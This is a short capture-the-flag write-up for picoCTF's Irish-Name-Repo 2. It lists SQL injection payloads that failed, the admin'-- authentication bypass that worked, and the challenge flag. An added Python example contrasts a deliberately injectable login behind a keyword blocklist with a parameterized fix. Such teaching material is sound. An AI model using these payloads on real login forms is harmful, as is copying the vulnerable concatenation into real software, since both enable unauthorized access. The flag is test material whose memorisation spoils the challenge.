This content originally appeared on DEV Community and was authored by David Disu
Coming from this challenge’s prequel Irish-Name-Repo 1 – picoCTF ’19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
- ' oR 1=1 -- – case manipulation
- %27%20%20%6f%72%20%31%3d%31%20%2d%2d – URL encoding
- '/**/ or /**/ 1=1 /**/ -- – comment obfuscation
- 00%' or 1=1 -- – null hex encoding
…and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.
STEPS TO SOLUTION
Use admin'-- in the username parameter.
Breakdown:
- admin – value for username query.
- ' – closes the input string.
- -- – comments out the remaining query.
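The breakdown above, worked through as an added example (not code from the original post or from the challenge): a login that pastes input into the SQL text behind a keyword blocklist, beside a parameterized version that treats the same input as data. The schema, credentials, function names and the blocklist itself are assumptions made for illustration.

```python
import sqlite3

# Hypothetical keyword filter; the challenge's real filter is not shown on the page.
BLOCKLIST = ("or", "union")


def make_db():
    """Build an in-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-pw')")
    return db


def passes_filter(value):
    """Reject input that contains any blocked keyword (case-insensitive)."""
    lowered = value.lower()
    return not any(word in lowered for word in BLOCKLIST)


def login_concat(db, username, password):
    """Vulnerable: user input becomes part of the SQL statement itself."""
    if not (passes_filter(username) and passes_filter(password)):
        return False
    query = ("SELECT 1 FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    # With username admin'-- the statement the database parses is:
    #   SELECT 1 FROM users WHERE username = 'admin'--' AND password = '...'
    # and everything after -- is a comment, so the password is never checked.
    return db.execute(query).fetchone() is not None


def login_param(db, username, password):
    """Hardened: values are bound as parameters and never parsed as SQL."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for user in ("admin' or 1=1 --", "admin'--"):
        print(repr(user),
              "concat:", login_concat(db, user, "x"),
              "param:", login_param(db, user, "x"))
```

The blocklist stops the `or 1=1` variants but not the quote and comment, which is why filtering keywords is not a fix; binding parameters is.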
FLAG: picoCTF{m0R3_SQL_plz_fa983901}
PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

